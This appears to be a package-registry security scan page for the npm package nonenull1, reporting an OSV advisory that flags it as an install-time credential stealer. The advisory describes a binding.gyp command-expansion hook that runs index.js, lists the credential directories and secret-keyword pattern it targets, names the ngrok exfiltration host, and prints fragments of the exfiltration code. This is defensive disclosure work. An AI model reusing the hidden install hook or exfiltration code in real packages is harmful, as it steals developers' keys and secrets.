registry  /  nonenull1  /  1.5.0

nonenull1@1.5.0

OSV Malicious Advisory

scanned 7m ago · by OpenSSF/OSV

OpenSSF/OSV advisory MAL-2026-10090 confirms this npm version as malicious. On `npm install`, nonenull1@1.0.0 auto-executes a credential stealer via node-gyp. package.json sets `gypfile: true`, and the shipped binding.gyp declares no native sources but places a GYP command-expansion `<!(node index.js...)` in the sources array, so node-gyp rebuild runs index.js during the configure step (an implicit install hook that is not declared as scripts.postinstall). index.js then: (1) collects host...

Advisory
MAL-2026-10090
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in nonenull1 (npm)
Details
On `npm install`, nonenull1@1.0.0 auto-executes a credential stealer via node-gyp. package.json sets `gypfile: true`, and the shipped binding.gyp declares no native sources but places a GYP command-expansion `<!(node index.js...)` in the sources array, so node-gyp rebuild runs index.js during the configure step (an implicit install hook that is not declared as scripts.postinstall). index.js then: (1) collects host fingerprint (os.hostname, os.userInfo, process.platform, cwd, node version, git user.email) and POSTs it to https://crabbing-thong-overhung.ngrok-free.dev/ping; (2) reads every file in ~/.ssh, ~/.aws, ~/.config, ~/.kube, ~/.docker, and ~/.gnupg, plus every.env* file discovered walking 8 directory levels up from cwd, and POSTs the contents to /exfil at the same host; (3) filters process.env for keys matching token|secret|key|pass|pwd|auth|api|cred|jwt|cookie and exfiltrates those values. The destination is a hardcoded ngrok tunnel controlled by the publisher. This is a textbook installer-side credential stealer with an implicit install hook designed to evade manifest-only scanners. ## Source: ossf-package-analysis (5f02ee2873da4d092fe8c8cc7418db3d2c661a64e5015eb0505fe26e5979da80) The OpenSSF Package Analysis project identified 'nonenull1' @ 1.5.2 (npm) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity.
Decision reason
One or more suspicious static signals were detected.

Decision evidence

public snapshot
Behavioral surface
Source
EnvironmentVarsFilesystemNetwork
Supply chainNo supply-chain packaging signals triggered.
Manifest
NoLicense
scanned 1 file(s), 903 B of source

Source & flagged code

3 flagged · loading source
index.jsView file
1const https = require('https'); L2: const fs = require('fs'); ... L7: const ngrokPayload = JSON.stringify({ L8: host: os.hostname(), L9: user: os.userInfo().username, L10: repo: process.env.GITHUB_REPOSITORY || 'N/A', L11: runner: process.env.RUNNER_ENVIRONMENT || 'N/A', ... L25: req.on('error', () => {}); L26: req.write(ngrokPayload); L27: req.end();
High
Host Fingerprint Exfiltration

Source collects local host identity data and sends it to an external endpoint.

index.jsView on unpkg · L1
binding.gypView file
path = binding.gyp kind = build_helper sizeBytes = 169 magicHex = [redacted]
Medium
Ships Build Helper

Package ships non-JavaScript build or shell helper files.

binding.gypView on unpkg
package.jsonView file
scripts registry_only=install
Critical
Manifest Confusion

Tarball package.json differs from the npm registry version manifest for scripts or dependency sets.

package.jsonView on unpkg

Findings

1 Critical1 High3 Medium2 Low
CriticalManifest Confusionpackage.json
HighHost Fingerprint Exfiltrationindex.js
MediumNetwork
MediumEnvironment Vars
MediumShips Build Helperbinding.gyp
LowFilesystem
LowNo License